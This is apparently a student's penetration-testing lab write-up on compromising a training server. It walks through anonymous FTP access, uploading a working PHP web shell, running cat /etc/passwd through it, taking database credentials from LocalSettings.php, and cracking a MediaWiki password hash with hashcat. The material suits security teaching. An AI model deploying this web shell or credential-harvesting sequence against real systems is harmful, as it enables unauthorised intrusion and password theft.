This lab is aimed at exploiting the server pippin.shire.org (10.0.5.25) using the reconnaissance methods we have covered in previous labs. I had a difficult time finding out how to properly check the hash for Pippin's password, as there was not a lot of resources online specifying how to do this, or how the key was supposed to be formatted in the file. The systems administrator for this box made a few mistakes here that allowed it to be exploited, namely allowing root permissions for somebody SSHing into the box. It would also be hard to tell where FTP server activity is coming from, as the FTP authentication method was set to anonymous.

• Perform an NMAP scan of the open ports on the server using sudo nmap -sV 10.0.5.25
• In this example, the FTP port was open and running.
  • In order to access this, start an FTP connection with ftp 10.0.5.25. You will be prompted for a username and password. Enter anonymous as the username, and for the password enter guest.
  • Now that you are in FTP, run a ls to see what directories are there. You can traverse to a directory, and upload a file in your current local working directory with put <filename>.

• Create a PHP script in your working directory that contains the following:

<?
if(isset($_REQUEST['cmd'])){
     echo "<pre>";
     $cmd = ($_REQUEST['cmd']);
     system($cmd);
     echo "</pre>";
     die;
}
?>

• FTP into the server again, and put the file into the /uploads folder.
• Execute webshell commands with: 10.0.5.25/upload/<filename.php>?cmd=cat+/etc/passwd

• In the FTP server once you have access, you should see a LocalSettings.php file. This is going to contain information regarding the root username and password for the mediawiki server.
• To pull this file, run a get, hit enter, and type in the name of the file + the local directory you want to copy it to.
• You should now be able to log into the peregrin.took user using the $wgDBpassword found in the LocalSettings file.

• Access the MySQL database by running: /bin/mysql -u root -p and entering the password above when prompted.
• Run SHOW DATABASES;, and select the mediawiki database with USE mediawiki
• Show tables in the database with SHOW TABLES; and select a table using SELECT * FROM mediawiki;
• You should see a hash for Pippin. Copy this and paste it into a text file called hash.txt on your desktop. Delete everything in it before the hash actually starts (i.e. the parts containing information like :pbkdf2 and :64:)
• In a terminal, with a smaller rockyou wordlist from previous labs, run the command grep -o '\bp[a-zA-Z]*\b' <rockyou list>.txt > pippin_passwords.txt to put all passwords starting with lowercase p into a file.
• Now, run hashcat with the command hashcat -m 12100 hash.txt -w 4 -a 0 pippin_passwords.txt